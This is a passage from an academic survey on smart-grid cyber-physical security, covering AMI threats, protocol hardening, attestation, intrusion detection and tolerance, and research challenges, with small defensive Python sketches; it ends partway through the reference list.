2) AMI and Demand Side Management: Future distribution systems will rely heavily on AMI to increase reliability, incorporate renewable energy, and provide consumers with granular consumption monitoring. AMI primarily relies on the deployment of "smart meters" at consumer locations to provide real-time meter readings. Smart meters provide utilities with the ability to implement load control switching (LCS) to disable consumer devices when demand spikes. Additionally, demand side management [37] introduces a cyber-physical connection between the metering cyber infrastructure and the power provided to consumers. The meter's current configuration is controlled by a meter data management system (MDMS) which lies under utility control. The MDMS connects to an AMI headend device which forwards commands and aggregates data collected from the meters throughout the infrastructure [38]. Networking within the AMI infrastructure will likely rely on many different technologies including RF mesh, WiMax, WiFi, and power line carrier. Application layer protocols such as C12.22 or IEC 61850 will be utilized to transmit both electricity usage and meter control operations between the meters and the MDMS. Fig. 7 provides an overview of the control flows that could impact consumer power availability.

[Fig. 6. Distribution control classification.]

a) Cyber vulnerabilities and solutions: The smart meters at consumer locations also introduce cyber-physical concerns. Control over whether the meter is enabled or disabled, and the ability to remotely disable devices through load control switching, provide potential threats from attackers. Adding additional security into these functions presents interesting challenges. A malicious meter disabling command can likely be prevented through the use of time-wait periods [39].
Since meter disabling does not require a real-time response, meters could be programmed to wait some time after receiving a command before disabling the device. This prevention would only address remote attacks, as the prevention logic could be bypassed if an attacker compromises the meter. Malicious LCS commands could provide a greater challenge due to more strict temporal requirements.

IV. SUPPORTING INFRASTRUCTURE SECURITY

The development of a secure supporting infrastructure is necessary to ensure information is accurately stored and transmitted to the appropriate applications. While the supporting infrastructure may share some common properties with traditional IT systems, the variation is significant enough to introduce numerous unique and challenging security concerns [9]. Specific properties include:

- long system lifecycles (>10 years);
- limited physical environment protection;
- restricted updating/change management capabilities;
- heavy dependency on legacy systems/protocols;
- limited information processing abilities.

A secure information system traditionally enforces the confidentiality of its data to protect against unauthorized access while ensuring its integrity remains intact. In addition, the system must provide sufficient availability of information to authorized users. The primary goal of any cyber-physical system is to provide efficient control over some physical process. This naturally prioritizes information integrity and availability to ensure the control state closely mirrors the physical system state. Security mechanisms such as cryptography, access control, and authentication are necessary to provide integrity in systems; however, all security mechanisms tailored for this environment must also provide sufficient availability. This constraint often limits the utilization of security mechanisms which fail closed, as they may deny access to a critical function.

The development of a trustworthy electric grid requires a thorough reevaluation of the supporting technologies to ensure they appropriately achieve the grid's unique requirements. The remainder of this section will address required security concerns within the supporting infrastructure and provide a review of current research efforts addressing these concerns. While there are a vast number of research areas within this domain, this paper will focus on areas with active security research tailored to the smart grid's supporting infrastructure.

A. Secure Communication

Power applications require a secure communications infrastructure to cope with the grid's geographically disperse resources. Data transmission often utilizes wireless communication, dialup, and leased lines, which provide increased physical exposure and introduce additional risk. The grid is also heavily reliant on its own set of higher level control system protocols, including Modbus, DNP3, IEC 61850, and ICCP. Often these protocols were not developed to be attack resilient and lack sufficient security mechanisms. This section will detail how encryption, authentication, and access control can be added to current communications to provide increased security.

1) Encryption: Retrofitting communication protocols to provide additional security is necessary for their continued use within untrusted spaces. Often this level of security can be obtained by deploying encrypted virtual private networks (VPNs) that protect network traffic through encapsulation within a cryptographic protocol [9].
Unfortunately, this solution is not always feasible, as the industry is fairly dependent on non-IP networks. In addition, strict availability requirements may not be able to handle the added latency produced by a VPN.

Research into bump-in-the-wire (BITW) encryption hardware attempts to ensure that messages can be appropriately encrypted and authenticated while limiting the latency appended by the solution. Work by Tsang and Smith provides a BITW encryption method that significantly reduces the latency through the reduction of message hold-back during the encryption and authentication [40]. Additional research has focused on retrofitting old protocols with appropriate security properties. Numerous efforts have addressed the modification of traditional SCADA protocols such as ICCP, DNP3, and Modbus to provide additional security while maintaining integration with current systems [41]-[43]. Deployment and key management activities still present difficulties within geographically disperse environments.

[Fig. 7. Control functions within AMI.]

2) Authentication: Secure remote authentication presents a challenge due to the lengthy deployments and limited change management capabilities. Authentication credential (e.g., keys and passwords) exposure increases throughout their lifetime, and protocols become increasingly prone to attack due to continual security reviews and cryptanalysis advancements. The development of strong, adaptive, and highly available authentication mechanisms is imperative to prevent unauthorized access.

Research by Khurana et al. has defined design principles required for authentication protocols within the grid [44]. By defining authentication principles, future system designers can ensure their systems achieve the efficiency and adaptability required for continued secure use. Additionally, research into more flexible authentication protocols has been proposed by Chakravarthy to provide adaptability to long deployments [45]. The proposed protocol provides re-keying and remoduling algorithms to protect against key compromises and future authentication module vulnerabilities.

3) Access Control: While encryption and authentication can deter external attackers, they do little to prevent insider threats or attackers that have already gained some internal access. Attackers with access to a communication network may be able to leverage various protocol functionality to inject malicious commands into control functions. The likelihood of a successful attack could be significantly reduced by appropriately configuring software and protocol usage to disable unnecessary functionality.

Evaluating industry protocols to identify potentially malicious functions is imperative to ensuring secure system configurations. Work by Mander dissects the DNP3 protocol, detailing the function codes and data objects that would be useful for attackers to access data, control, or impact the availability of a remote DNP3 master [46]. This research provides a foundation for understanding the likely physical impact from a compromised communication channel. Additional research in this domain models feasible attacks against control systems based on the current protocol specification [47].
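One way to act on this kind of protocol analysis is a simple allow-list filter in front of an outstation: requests whose application-layer function code is not explicitly permitted are dropped. The sketch below illustrates the idea only; the function-code constants are assumptions for illustration, and a faithful DNP3 implementation would also need to parse the full link-, transport-, and application-layer framing.

```python
# Illustrative allow-list filter for control-system requests, in the spirit of
# disabling unnecessary protocol functionality. Codes below are examples only;
# consult the protocol specification for an actual deployment.
READ, WRITE, OPERATE, DIRECT_OPERATE, COLD_RESTART = 0x01, 0x02, 0x04, 0x05, 0x0D

ALLOWED_FUNCTION_CODES = {READ}          # e.g., a monitoring-only master

def filter_request(function_code: int) -> bool:
    """Return True if the request may be forwarded to the outstation."""
    return function_code in ALLOWED_FUNCTION_CODES

for fc in (READ, WRITE, DIRECT_OPERATE, COLD_RESTART):
    action = "forward" if filter_request(fc) else "drop"
    print(f"function code 0x{fc:02X}: {action}")
```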
More sophisticated protocols targeted for smart grid use, such as ANSI C12.22 and IEC 61850, require additional analysis to ensure secure implementation in new system deployments.

B. Device Security

Embedded systems are used throughout the grid to support monitoring and control functions. The critical role placed on these devices introduces significant cybersecurity concerns due to their placement in physically unprotected environments. Large-scale deployments of embedded devices also incentivize the use of marginally cheaper hardware, leaving little computational capacity to support security functions such as malware or intrusion monitoring. This also stymies the ability to produce the amount of entropy required to create secure cryptographic keys [48]. The development of secure computation within embedded platforms remains a key challenge throughout CPSs.

1) Remote Attestation: Smart meters provide one particularly concerning utilization of embedded systems due to their expansive deployments and impact on consumers. Research into the development of remotely attestable smart meters has suggested that a small static kernel can be used to cryptographically sign loaded firmware [49]. The resulting signature can then be sent in response to attestation queries to verify that meters have not been corrupted. By also providing support for remote firmware updates, the kernel can allow future reconfiguration of the devices while still providing a trusted platform. Unfortunately, these security mechanisms may still remain vulnerable to additional attack vectors [50].

Embedded devices also play important roles in the bulk power system. Intelligent electronic devices (IEDs) utilize embedded devices to control relays throughout the grid. Recent events have shown these devices can be maliciously reprogrammed to usurp intended control functions [5]. The development of improved attestation mechanisms will play a critical role in the cybersecurity enhancement of the grid.

C. Security Management and Awareness

An increased awareness of security risk and appropriate management of security-relevant information play an equally important role in maintaining a trusted infrastructure. This section addresses a range of security activities and tools, including digital forensics and security incident/event management.

1) Digital Forensics: The ability to perform accurate digital forensics within the electric grid is imperative to identifying security failures and preventing future incidents. Strong forensic capabilities are also necessary during event investigation to determine the cause or extent of damage from an attack. While forensic analysis on traditional IT systems is well researched, the large number of embedded systems and legacy devices within the grid presents new challenges.

Research efforts by Chandia et al. have proposed the deployment of "forensic agents" throughout the cyber infrastructure to collect data about potential attacks [51]. Information collected by these agents can then be prioritized based on its ability to negatively affect grid operations.
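A minimal, hypothetical sketch of that prioritization step is given below; the asset and event weights are invented placeholders rather than values from the cited work.

```python
import heapq

# Hypothetical criticality weights; real values would come from the utility's
# own impact studies rather than from this sketch.
ASSET_WEIGHT = {"protection_relay": 1.0, "rtu": 0.8, "hmi": 0.5, "historian": 0.2}
EVENT_WEIGHT = {"firmware_change": 1.0, "unexpected_master": 0.7, "failed_login": 0.3}

def impact_score(asset_type, event_kind):
    """Crude proxy for how badly this event could affect grid operations."""
    return ASSET_WEIGHT.get(asset_type, 0.1) * EVENT_WEIGHT.get(event_kind, 0.1)

def prioritize(events):
    """Yield collected events so that the analyst sees the highest-impact ones first."""
    heap = [(-impact_score(a_type, kind), asset, kind, detail)
            for a_type, asset, kind, detail in events]
    heapq.heapify(heap)
    while heap:
        neg_score, asset, kind, detail = heapq.heappop(heap)
        yield -neg_score, asset, kind, detail

collected = [
    ("historian", "hist-01", "failed_login", "three failed SSH logins"),
    ("protection_relay", "relay-12", "firmware_change", "firmware hash mismatch"),
    ("rtu", "rtu-07", "unexpected_master", "polls from an unknown master address"),
]
for score, asset, kind, detail in prioritize(collected):
    print(f"{score:4.2f}  {asset:9s} {kind:18s} {detail}")
```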
Expanding forensic capabilities within embedded systems, including meters and IEDs, is necessary to ensure these critical resources maintain integrity. Additionally, operational systems often cannot be detached for forensic analysis, and research into online analysis methods should be explored for these instances.

2) Security Incident and Event Management: The development of technologies to collect and analyze relevant data sources, such as system logs, IDS results, and network flow information, is necessary to ensure data are properly organized and prioritized. Briesemeister et al. researched the integration of various cybersecurity data sources within a control system and demonstrated its ability to detect attacks [52]. This work also coupled visualization tools to provide operators with a real-time understanding of network health. Tailoring this technology to provide efficient analysis of the grid will place an impetus on control system alarms, as they provide information on potential physical impacts initiated by cyber attacks. Incidents and events within the smart grid will vary greatly from their IT counterparts; analysis methods should be correlated with knowledge of the physical system to determine anomalies. Aggregation and analysis algorithms may need tailoring for environments with decreased incident rates due to smaller user bases and segregated networks.

D. Cybersecurity Evaluation

1) Cybersecurity Assessment: The grid's security posture should be continually analyzed to ensure it provides adequate security. The system's complexity, long lifespans, and continuously evolving cyber threats present novel attack vectors. The detection and removal of these security issues should be addressed specifically for both the power applications and the supporting infrastructure. Current research has primarily focused on the supporting infrastructure, as it maintains many similarities with more traditional cybersecurity testing. Methodologies used to perform vulnerability assessments and penetration testing have raised numerous cybersecurity concerns within the current grid [53], [54].

Smart grid technologies will present increasing inter-domain connectivity, thereby creating a more exposed cyber infrastructure and trust dependencies between many different parties. NIST's "Guidelines for Smart Grid Cyber Security" (NISTIR 7628) has proposed a more robust set of cybersecurity requirements to ensure the appropriateness of cyber protection mechanisms [2]. NIST identifies logical interfaces between systems and parties while assigning a criticality level (e.g., high, medium, low) for each interface's confidentiality, integrity, and availability requirements. The document then presents a list of necessary controls to provide an appropriate security baseline for the resulting interfaces.

2) Research Testbeds and Evaluations: Researching cyber physical issues requires the ability to analyze the relationship between the cyber and physical components. Real-world data sets containing system architecture, power flows, and communication payloads are currently unavailable. Without these data, researchers are unable to produce accurate solutions to modern problems. Increased collaboration between government, industry, and academia is required to produce useful data which can facilitate needed research. While SCADA testbeds provide a foundational tool for the basis of cyber physical research, ensuring that system parameters closely represent real-world systems remains a challenge.
The development of SCADA testbeds provides critical resources to facilitate research within this domain. The National SCADA Test Bed (NSTB) hosted at Idaho National Laboratory provides a real-world test environment employing real bulk power system components and control software [55]. NSTB research has resulted in the discovery of multiple cyber vulnerabilities [56]. While this provides an optimal test environment, the cost is impractical for many research efforts. Work done by Sandia National Laboratory has utilized a simulation-based testbed allowing the incorporation of both physical and virtual components. The virtual control system environment (VCSE) allows the integration of various power system simulators into a simulated network environment and industry-standard control system software [57]. Academic efforts at Iowa State University and the University of Illinois at Urbana-Champaign provide similar environments [58], [59].

E. Intrusion Tolerance

While attempts to prevent intrusions are imperative to the development of a robust cyber infrastructure, failures in prevention techniques will likely occur. The ability to detect and tolerate intrusions is necessary to mitigate the negative effects of a successful attack.

1) Intrusion Detection Systems: The successful utilization of intrusion detection in the IT domain suggests it may also provide an important component in smart grid systems. Research by Cheung et al. has leveraged salient control system network properties into a basis for IDS technology [60]. Common data values, protocol functions, and communication endpoints were modeled by the IDS such that all violating packets could be flagged as malicious.

While the previous research provides unique detection capabilities, an attacker may still be able to create packets which closely resemble normal communications. For example, a command to trip a breaker cannot be flagged as malicious on its own, since it is a commonly used control function. Producing grid-aware intrusion detection will require a built-in understanding of grid functions. Work by Jin et al. shows how basic power flow laws leveraging Bayesian reasoning can help reduce false positives by exhibiting a real-world understanding of the system [61].

The transition to smart grid technologies will likely reduce the number of qualities that make traditional SCADA communications amenable to intrusion detection. Performing intrusion detection in such a complex environment will require novel data collection mechanisms as well as the ability to detect and aggregate attack indicators across multiple network domains [62].

2) Tolerant Architectures: Intrusion tolerance mechanisms have recently gained increased attention as a method to ensure a system's ability to operate effectively during an attack. Research within the CRUTIAL project explores both proactive and reactive mechanisms to prevent cyber attacks from impacting the system's integrity [63]. This research explores a Byzantine-tolerant protection paradigm which assures correct operation as long as no more than f out of 3f + 1 components are attacked.
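The quorum arithmetic behind that guarantee can be illustrated with a few lines of Python; this is a toy voting sketch, not the CRUTIAL architecture itself, and the replica outputs are invented.

```python
from collections import Counter

def max_faults_tolerated(n_replicas: int) -> int:
    # Byzantine fault tolerance needs n >= 3f + 1 replicas to mask f compromised ones.
    return max((n_replicas - 1) // 3, 0)

def agreed_output(replica_outputs, f):
    # Accept a command only if at least 2f + 1 replicas agree (a Byzantine quorum);
    # otherwise report that no trustworthy decision is possible.
    value, count = Counter(replica_outputs).most_common(1)[0]
    return value if count >= 2 * f + 1 else None

outputs = ["close_breaker", "close_breaker", "open_breaker", "close_breaker"]
f = max_faults_tolerated(len(outputs))        # 4 replicas -> tolerates f = 1
print(f, agreed_output(outputs, f))           # 1 close_breaker  (3 matching >= 2f + 1 = 3)
```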
Extended research within intrusion tolerance should incorporate the smart grid's specific availability requirements and infrastructure designs. Traditional models relying on Byzantine fault/intrusion tolerance mechanisms present significant cost and may not be practical within the smart grid. Future designs can leverage known physical system redundancies and recovery capabilities to assist with traditional intrusion/fault tolerance design models.

V. EMERGING RESEARCH CHALLENGES

As smart grid technologies become more prevalent, future research efforts must target a new set of cybersecurity concerns. This section documents emerging research challenges within this domain.

A. Risk Modeling

The risk modeling methodology and subsequent risk index should capture both the vulnerability of cyber networks in the smart grid and the potential impacts an adversary could inflict by exploiting these vulnerabilities.

- The cyber vulnerability assessment plan in risk modeling should be thorough. It should include all sophisticated cyber-attack scenarios, such as electronic intrusions, DoS, data integrity attacks, timing attacks, and coordinated cyber attacks. The tests should be conducted on different vendors' solutions and configurations.
- The impact analysis should include dynamics introduced by new power system components and associated controls, along with existing ones. The analyses must check whether any power system stability limits are violated for different attack templates. For example, current wind generation turbines offer uneconomical frequency control and do not contribute to system inertia; hence, attack scenarios should include attacks on the system during high wind penetration.
- Exposure from increased attack surfaces must be managed, due to the inclusion of the AMI and MDMS infrastructures, widespread communication links to distribution control centers, and potentially transmission and generation control centers. Impact studies should include attack vectors that target such devices and evaluate system stability.

B. Risk Mitigation Algorithms

As in the case of risk modeling, risk mitigation must include solutions at both the cyber and the power system level. Consider the following attack scenario. One fundamental vision of the smart grid is to allow controllability of domestic devices by utilities to help reduce costs. If an adversary intrudes into the AMI network of a neighborhood to turn on large blocks of load when they are expected to be turned off, the system could experience severe stability problems. Cyber defense mechanisms that are able to detect/prevent such an attack, and power system defense mechanisms that ensure stable operation in the event of an attack, should be developed.

- Attack-resilient control provides defense in depth to a CPS. In addition to dedicated cybersecurity software and hardware, robust control algorithms enhance security at the application layer. Measurements and other data obtained through SCADA and emerging wide-area monitoring systems have to be analyzed to detect the presence of anomalies. For example, an application should first check whether an obtained measurement lies within an acceptable range and reject those that do not comply. However, a smart attacker could develop attack templates that satisfy these criteria and force the operator into taking wrong control actions. Hence, additional tests based on forecasts, historical data and engineering sense should be devised to ascertain the current state of the system (a minimal sketch of such a check is given below).
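The check below is a toy illustration in Python of that layered plausibility test: hard range limits, deviation from a forecast, and deviation from recent history. Every threshold, limit, and value is invented and not taken from the cited works.

```python
from statistics import mean, stdev

def plausible(measured_mw: float, recent_history: list, forecast_mw: float,
              hard_limits=(0.0, 400.0), forecast_tol=0.15, sigma_tol=4.0) -> bool:
    """Reject values outside hard limits, far from the forecast, or far from recent history."""
    lo, hi = hard_limits
    if not lo <= measured_mw <= hi:
        return False
    if abs(measured_mw - forecast_mw) > forecast_tol * max(forecast_mw, 1.0):
        return False
    if len(recent_history) >= 2:
        mu, sigma = mean(recent_history), stdev(recent_history)
        if sigma > 0 and abs(measured_mw - mu) > sigma_tol * sigma:
            return False
    return True

history = [212.0, 215.5, 214.1, 213.8]
print(plausible(214.9, history, forecast_mw=215.0))   # True: consistent reading
print(plausible(180.0, history, forecast_mw=215.0))   # False: within hard limits but implausible
```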
- An attack might not be successful if the malicious measurements do not conform to the dynamics of the system. In most cases, the physical parameters of the system (e.g., generator constants) are protected by utilities. These parameters play a part in determining the state of the system and the system's response to an event. Hence, algorithms that incorporate such checks could help in identifying malicious data when an attacker attempts to mislead the operator into executing incorrect commands.
- Intelligent power system control algorithms that are able to keep the system within stability limits during contingencies are critical. Additionally, the development of enhanced power management systems capable of addressing high-impact contingency scenarios is necessary.
- Domain-specific anomaly detection and intrusion tolerance algorithms that are able to classify measurements and commands as good/bad are key. In addition, built-in intelligence is required so that devices can respond appropriately to anomaly situations.

C. Coordinated Attack Defense

The power system, in most cases, is operated at the (N-1) contingency condition and can inherently counter attacks that are targeted at single components. This means the effect of losing a single transmission line can be negated by rerouting power through alternate lines. However, the system was not designed to fend off attacks that target multiple components. Such coordinated attacks, when carefully structured and executed, can push the system outside the protection zone. The increased attack surface introduced by the smart grid provides an opening for an adversary to plan such attacks.

The North American Electric Reliability Corporation (NERC) has instituted the Cyber Attack Task Force (CATF) to gauge system risk from such attacks and develop feasible, cost-effective mitigation techniques [64]. Future mitigation strategies include the following.

- Risk modeling and mitigation of coordinated attacks is key to preventing the occurrence of attacks.
- Attack detection tools that monitor traffic and simultaneously correlate events at multiple substations could help in early identification of coordinated attack scenarios.
- Future power system planning and reliability studies should accommodate coordinated attack scenarios in their scope. Strategic enhancements to the power system infrastructure could help the system operate within stability limits during such scenarios.

D. AMI Security

Geographically distributed architectures with high availability requirements present numerous security and privacy concerns.
Specific research challenges with AMI include:

- remote attestation of AMI components and tamper detection mechanisms to prevent meter manipulations;
- exploration of security failures due to common-mode failures (e.g., propagating malware, remotely exploitable vulnerabilities, shared authenticators);
- model-based anomaly methods to determine attacks based on known usage patterns, and fraud/attack detection algorithms;
- security versus privacy tradeoffs, including inference capabilities on consumer habits, anonymization mechanisms, and anonymity concerns from both data-at-rest and data-in-motion perspectives.

Numerous additional privacy concerns have been raised within the smart grid; NIST has provided a more comprehensive review of these concerns [2].

E. Trust Management

The dynamic nature of the smart grid will require complex notions of trust to evaluate the acceptability of system inputs/outputs.

- Dynamic trust distribution with adaptability to evolving threats, likely cybersecurity failures (e.g., exposed authenticators, unpatched systems) and grid emergencies (e.g., cascading failures, natural disasters, personnel issues).
- Trust management based on data source (e.g., SCADA field device, adjacent utilities) and verification of trust allocations for low-trust systems (physically unprotected, limited attribution capabilities), along with trust verification mechanisms/algorithms and impact analysis of trust manipulation mechanisms.
- Aggregation of trust with increasing data/verification sources (e.g., more sensors, correlations with previous knowledge of grid status) and accumulation of trust requirements throughout AMI.

F. Attack Attribution

Attack attribution will play an important role in deterrence within the smart grid. High availability requirements limit the ability to disconnect potential victims within the control network, especially when stepping-stone attack methods are used.

- Attribution capabilities within and between controlled networks, including AMI, wide-area measurement systems, and control networks.
- Leveraging known information flows, data formats, and packet latencies.
- Identifying stepping-stone attacks within utility-owned/managed infrastructures based on timing analysis, content inspection, and packet marking/logging schemes.
- Methods to reduce insider threat impacts while maintaining appropriate adaptability in emergency situations, such as improved flexibility of authorization and authentication or defense-in-depth implementations.

G. Data Sets and Validation

Research within the smart grid realm requires realistic data and models to assure accurate results and real-world applicability.

- Data models for SCADA networks, AMI, and wide-area monitoring networks, including communication protocols, common information models (CIM), and data sources/sinks.
- Temporal requirements for data (e.g., 4 ms for protective relaying, 1-4 s for SCADA, etc.) and realistic data sets of control-loop interactions (e.g., AGC, voltage regulation, substation protection schemes).

VI. CONCLUSION

A reliable smart grid requires a layered protection approach consisting of a cyber infrastructure which limits adversary access and resilient power applications that are able to function appropriately during an attack.
This work provides an overview of smart grid operation, associated cyber infrastructure and power system controls that di-rectly influence the quality and quantity of power deliv-ered to the end user. The paper identifies the importanceof combining both power application security andsupportinginfrastructure security into the risk assessment process and provides a methodology for impact evaluation. A smart grid control classification is i ntroduced to clearly identify communication technologies and control messages re-quired to support these control functions. Next, a review ofcurrent cyber infrastructure security concerns are pre-sented to both identify possible weaknesses and addresscurrent research efforts. Future smart grid research chal-lenges are then highlighted detailing the cyber physical security relationship within this domain. While this work focuses on the smart grid environment, the general appli-cation and infrastructure framework including many of theresearch concerns will also transition to other criticalinfrastructure domains. h REFERENCES [1] A Systems View of the Modern Grid , National Energy Technology Laboratory (NETL), U.S. Department of Energy (DOE), 2007. [2] NISTIR 7628: Guidelines for Smart Grid Cyber Security , National Institute for Standards and Technology, Aug. 2010. [3] GAO-04-354: Critical Infrastructure Protection Challenges and Efforts to Secure Control Systems , U.S. Government Accountability Office (GAO), Mar. 2004. [4] NERC Critical Infrastructure Protection (CIP) Reliability Standards , North American Electric Reliability Corporation, 2009. [5] N. Falliere, L. Murchu, and E. Chien, BW32.Stuxnet Dossier, Version 1.3, [ Symantec, Nov. 2010. [6] S. Baker, S. Waterman, and G. Ivanov, BCrossfire: Critical infrastructure in the age of cyber war, [McAfee, 2009. [7] GAO-11-117: Electricity Grid Modernization: Progress Being Made on Cybersecurity Guidelines, but Key Challenges Remainto be Addressed , U.S. Government Accountability Office (GAO), Jan. 2011. [8] G. Stoneburner, A. Goguen, and A. Feringa, BNIST SP 800-30: Risk management guide for information technology systems, [National Institute of Standards and Technology, Tech. Rep., Jul. 2002. [9] K. Stouffer, J. Falco, and K. Scarfone, BNIST SP 800-82: Guide to industrial control systems (ICS) security, [National Institute of Standards and Technology, Tech. Rep., Sep. 2008. [10] Common Cybersecurity Vulnerabilities in Industrial Control Systems , Department of Homeland Security (DHS) Control Systems Security Program (CSSP), May 2011. [11] J.-C. Laprie, K. Kanoun, and M. Kaniche, BModelling interdependencies between the electricity and information infrastructures, [inComput. Safety, Reliability, Security , vol. 4680, F. Saglietti and N. Oster, Eds. Berlin, Germany: Springer-Verlag, 2007, pp. 54 67. [12] D. Kundur, X. Feng, S. Liu, T. Zourntos, and K. Butler-Purry, BTowards a framework for cyber attack impact analysis of theelectric smart grid, [inProc. 1st IEEE Int. Conf. Smart Grid Commun. , Oct. 2010, pp. 244 249.[13] C.-W. Ten, G. Manimaran, and C.-C. Liu, BCybersecurity for critical infrastructures: Attack and defense modeling, [IEEE Trans. Syst. Man Cybern. A, Syst. Humans , vol. 40, no. 4, pp. 853 865, Jul. 2010. [14] C.-W. Ten, C.-C. Liu, and G. Manimaran, BVulnerability assessment of cybersecurity for SCADA systems, [IEEE Trans. Power Syst., vol. 23, no. 4, pp. 1836 1846, Nov. 2008. [15] Y.-L. Huang, A. A. Cardenas, S. Amin, Z.-S. Lin, H.-Y. Tsai, and S. Sastry. (2009). 
Understanding the physical and economic consequences of attacks on control systems.Int. J. Critical Infrastructure Protect. [Online]. 2(3), pp. 73 83. Available: http://www. sciencedirect.com/science/article/pii/ S1874548209000213 [16] C. J. Mozina, M. Reichard, Z. Bukhala, S. Conrad, T. Crawley, J. Gardell, R. Hamilton, I. Hasenwinkle, D. Herbst, L. Henriksen, G. Johnson, P. Kerrigan, S. Khan, G. Kobet, P. Kumar, S. Patel, B. Nelson, D. Sevcik, M. Thompson,J. Uchiyama, S. Usman, P. Waudby, and M. Yalla, BCoordination of generator protection with generator excitation control and generator capability; working group j-5 of the rotating machinery subcommittee, power system relay committee, [inProc. IEEE Power Eng. Soc. General Meeting , Jun. 2007, DOI: 10.1109/PES.2007.386034. [17] GE EX2100 Excitation Systems . [Online]. Available: http://www.ge-mcs.com/ en/generator-control-and-protection/ ex-excitation-systems/ex2100.html [18] ABB 800xA Turbine Governor . [Online]. Available: http://www.abb.com/product/us/9AAC115756.aspx [19] P. Mohajerin Esfahani, M. Vrakopoulou, K. Margellos, J. Lygeros, and G. Andersson,BCyber attack in a two-area power system: Impact identification using reachability, [ inProc. Amer. Control Conf. , Jul. 2010, pp. 962 967. [20] S. Sridhar and G. Manimaran, BData integrity attacks and their impacts on SCADA control system, [inProc. Power Energy Soc. General Meeting , Jul. 2010, DOI: 10.1109/PES.2010. 5590115. [21] L. Mili, T. Van Cutsem, and M. Ribbens-Pavella, BBad data identificationmethods in power system state estimation VA comparative study, [IEEE Power Eng. Rev. , vol. PER-5, no. 11, pp. 27 28, Nov. 1985. [22] A. Monticelli and A. Garcia, BReliable bad data processing for real-time stateestimation, [IEEE Trans. Power Apparat. Syst., vol. PAS-102, no. 5, pp. 1126 1139, May 1983. [23] E. Handschin, F. Schweppe, J. Kohlas, and A. Fiechter, BBad data analysis for power system state estimation, [IEEE Trans. Power Apparat. Syst. , vol. PAS-94, no. 2, pp. 329 337, Mar. 1975. [24] A. Garcia, A. Monticelli, and P. Abreu, BFast decoupled state estimation and bad data processing, [IEEE Trans. Power Apparat. Syst., vol. PAS-98, no. 5, pp. 1645 1652, Sep. 1979. [25] X. Nian-de, W. Shi-ying, and Y. Er-keng, BA new approach for detection and identification of multiple bad data in power system state estimation, [IEEE Trans. Power Apparat. Syst., vol. PAS-101, no. 2, pp. 454 462, Feb. 1982. [26] V. Quintana, A. Simoes-Costa, and M. Mier, BBad data detection and identification techniques using estimation orthogonal methods, [IEEE Trans. Power Apparat. Syst., vol. PAS-101, no. 9, pp. 3356 3364, Sep. 1982. [27] Y. Liu, P. Ning, and M. K. Reiter, BFalse data injection attacks against state estimation in electric power grids, [inProc. 16th ACM Conf. Comput. Commun. Security . New York: ACM, 2009, pp. 21 32. [28] O. Kosut, L. Jia, R. Thomas, and L. Tong, BLimiting false data attacks on power system state estimation, [inProc. 44th Annu. Conf. Inf. Sci. Syst. , Mar. 2010, DOI: 10.1109/CISS.2010.5464816. [29] D. Callaway and I. Hiskens, BDetecting false data injection attacks on DC state estimation, [inProc. 1st Workshop Secure Control Syst. , Apr. 2010. [Online]. Available: https://www.truststc.org/conferences/10/CPSWeek/papers.htm . [30] L. Xie, Y. Mo, and B. Sinopoli, BFalse data injection attacks in electricity markets, [in Proc. 1st IEEE Int. Conf. Smart Grid Commun. , Oct. 2010, pp. 226 231. [31] A. J. Wood and B. F. 
Wollenberg, Power Generation, Operation and Control, 2nd ed.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 222 Proceedings of the IEEE |V o l .1 0 0 ,N o .1 ,J a n u a r y2 0 1 2 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Hoboken, NJ: Wiley-Interscience, Jan. 1996. [Online]. Available: http://www.amazon.com/Power-Generation-Operation-Control- Allen/dp/0471586994 . [32] L. R. Phillips, M. Baca, J. Hills, J. Margulies, B. Tejani, B. Richardson, and L. Weiland, Analysis of Operations and Cyber SecurityPolicies for a System of Cooperating Flexible Alternating Current Transmission System (FACTS) Devices , Dec. 2005. [33] S. Sridhar and G. Manimaran, BData integrity attack and its impacts on voltage controlloop in power grid, [inProc. IEEE Power Energy Soc. General Meeting , Detroit, MI, Jul. 2011. [34] A. Phadke and J. S. Thorp, Synchronized Phasor Measurements and Their Applications . New York: Springer-Verlag, 2008. [35] J. Dagle, BThe North American synchrophasor initiative (NASPI), [inProc. IEEE Power Energy Soc. General Meeting , Jul. 2010, DOI: 10.1109/PES.2010.5590048. [36] J. Weiss, Protecting Industrial Control Systems from Electronic Threats . New York: Momentum Press, May 2010. [37] D. Callaway and I. Hiskens, BAchieving controllability of electric loads, [ Proc. IEEE , vol. 99, no. 1, pp. 184 199, Jan. 2011. [38] Security Profile for Advanced Metering Infrastructure, v2.0 , The Advanced Security Acceleration Project (ASAP-SG), Jun. 2010. [39] R. Anderson and S. Fuloria, BWho controls the off switch? [2010 1st Proc. IEEE Int. Conf. Smart Grid Commun. (SmartGridComm) , pp. 96 101, Oct. 4 6, 2010, DOI: 10.1109/ SMARTGRID.2010.5622026. [Online]. Available: http://ieeexplore.ieee.org/ stamp/stamp.jsp?tp=&arnumber= 5622026&isnumber=5621989 . [40] P. Tsang and S. Smith, BYASIR: A low-latency, high-integrity security retrofit for legacy SCADA systems, [inProc. IFIP TC 11 23rd Int. Inf. Security Conf. , vol. 278, S. Jajodia, P. Samarati, and S. Cimato, Eds. Boston,MA: Springer-Verlag, 2008, pp. 445 459. [41] M. Majdalawieh, F. Parisi-Presicce, and D. Wijesekera, BDNPSec: Distributed network protocol version 3 (DNP3) security framework, [inAdv. Comput., Inf., Syst. Sci., Eng., K. Elleithy, T. Sobh, A. Mahmood, M. Iskander, and M. Karim, Eds. Amsterdam, The Netherlands: Springer-Verlag, 2006, pp. 227 234.[42] I. Fovino, A. Carcano, M. Masera, and A. Trombetta, BDesign and implementation of a secure Modbus protocol, [inCritical Infrastructure Protection III , vol. 311, C. Palmer and S. Shenoi, Eds. Boston, MA: Springer-Verlag, 2009, pp. 83 96. [43] J. T. Michalski, A. Lanzone, J. Trent, and S. Smith, BSAND2007-3345: Secure ICCP Integration Considerations and Recommendations, [Sandia National Laboratories, Jun. 2007. [44] H. Khurana, R. Bobba, T. Yardley, P. Agarwal, and E. Heine, BDesign principles for power grid cyber-infrastructure authentication protocols, [inProc. 43rd Hawaii Int. Conf. Syst. Sci., Washington, DC, 2010, DOI: 10.1109/HICSS.2010.136. [45] R. Chakravarthy, C. Hauser, and D. E. Bakken, BLong-lived authentication protocols for process control systems, [ Int. J. Critical Infrastructure Protect. , vol. 3, no. 3 4, pp. 174 181, 2010. [46] T. Mander, R. Cheung, and F. Nabhani, BPower system DNP3 data object security using data sets, [Comput. Security , vol. 